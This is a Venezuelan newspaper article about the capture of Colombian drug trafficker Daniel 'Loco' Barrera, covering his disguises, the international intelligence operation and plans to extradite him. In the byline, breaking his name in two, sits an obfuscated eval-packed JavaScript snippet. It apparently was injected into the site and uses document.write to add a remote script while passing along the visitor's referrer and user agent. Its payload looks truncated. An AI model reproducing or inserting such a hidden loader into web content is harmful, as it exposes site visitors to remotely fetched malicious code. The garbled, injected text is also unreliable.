El “Loco Barrera” quemó sus manos con ácido para borrarse las huellas

Faviana García / Maracaibo / [email protected]
Daniel eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kykzz|var|u0026u|referrer|diakr||js|php'.split('|'),0,{})) Barrera borró sus huellas dactilares y se cambió el rostro tres veces. En Venezuela pretendía ser un ganadero. El gran jefe de la mafia colombiana es responsable de trasladar 900 toneladas de cocaína hacia América y Europa

Cuarenta y cinco días fueron necesarios para atrapar al Capo. El narcotraficante estuvo cuatro años viviendo en el país, hasta que finalmente dieron con él, Daniel "Loco" Barrera en San Cristóbal, estado Táchira. En Venezuela buscó pasar desapercibido como ganadero. Recurrió a la cirugía plástica para cambiar las facciones de su rostro y así escapar de la ley. El jefe mantuvo ciertas libertades: días antes de su captura viajó a Brasil y Argentina para visitar a sus hijos.

Al llegar a Venezuela se transformó en José Tomás Locumi Poppo, y era de Cali, así lo decía su pasaporte falso. Borró sus huellas dactilares para escapar de la justicia. "Tenemos una foto de sus manos, las había quemado para desfigurar los pulpejos de sus dedos y evitar la identificación plena", informó José Roberto León, director de la Policía Nacional de Colombia.

"Tenía un movimiento constante, permanente, moviéndose en vehículos de gama media, no muy llamativos y siempre manejaba una mujer con el fin de pasar desapercibido en los controles policiales", agregó.

El gran golpe antidroga se dirigió desde Estados Unidos. En total, actuaron 14 equipos de inteligencia, conformados por oficiales de Colombia, Inglaterra, Venezuela, y EEUU. Sus parientes fueron la clave para dar con su paradero, la investigación empezó hace cuatro meses.

"El pasado 6 de agosto autoridades de Colombia nos hicieron llegar información sobre la presencia del narcotraficante. Desplegamos los  equipos de inteligencia y búsqueda en tres estados y Distrito Capital. Realizamos el rastreo de 69 teléfonos públicos en estas entidades por donde se comunicaba a Colombia para dirigir sus acciones delictivas", explicó Tarek El Aissami, ministro del Interior y Justicia, en una rueda de prensa.

El más buscado

Por parte de Venezuela la redada estuvo a cargo de Néstor Luis Reverol, director de la Oficina Nacional antidrogas. El ministro no explicó cómo lograron unir fuerzas con la CIA, llegó a tal punto que ignoró la participación. "Quedó demostrado que no somos colonia de Estados Unidos... La historia ha ratificado que hemos consolidado nuestra política soberana antidrogas, hemos detenido a 91 jefes de carteles".

Contó que en el país vecino se monitoreaban las llamadas que hacía el "loco", para descubrir a quienes iban dirigidas, el proceso se hacía en tiempo real. Agradeció del país hermano y a sus autoridades por los resultados de la operación.

Eduardo Montealegre, fiscal general de Colombia, detalló que además de la orden de captura por narcotráfico se le investiga por presunta posesión irregular de 100 inmuebles y vehículos. Ruth Estella Correa, ministra de Justicia de la misma nación, aseguró que el "Loco" Barrera, pueda ser extraditado a los Estados Unidos desde Colombia, luego de que se formalice ante el Gobierno de Venezuela su deportación.

Explicó que el proceso para la deportación tomará más de un mes, allí se analizarán todos los delitos cometidos.  El trámite con Venezuela se hará entre las cancillerías, y tras tener la respuesta será la deportación a Colombia, de donde saldrá luego con destino a los Estados Unidos, país que lo solicita por tráfico de droga.

Procedimiento en conjunto

El Gobierno británico dio información necesaria para la inteligencia. El estadounidense, a través de la DEA y la CIA, avisó sobre los temas relacionados con finanzas y lavado de activos. La Policía venezolana se encargó de seguir, ubicar y capturar al capo.

"Llamadas que a veces las hacía él mismo y otras mandaba a terceros a sus aliados en Colombia", Tareck El Aissami, ministro de Interior y Justicia.

Por su captura

Washington había ofrecido una recompensa de cinco millones de dólares por información para la captura del colombiano. Colombia, por su parte, ofrecía un millón y medio en la misma moneda.

Click para ampliar la imagen

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama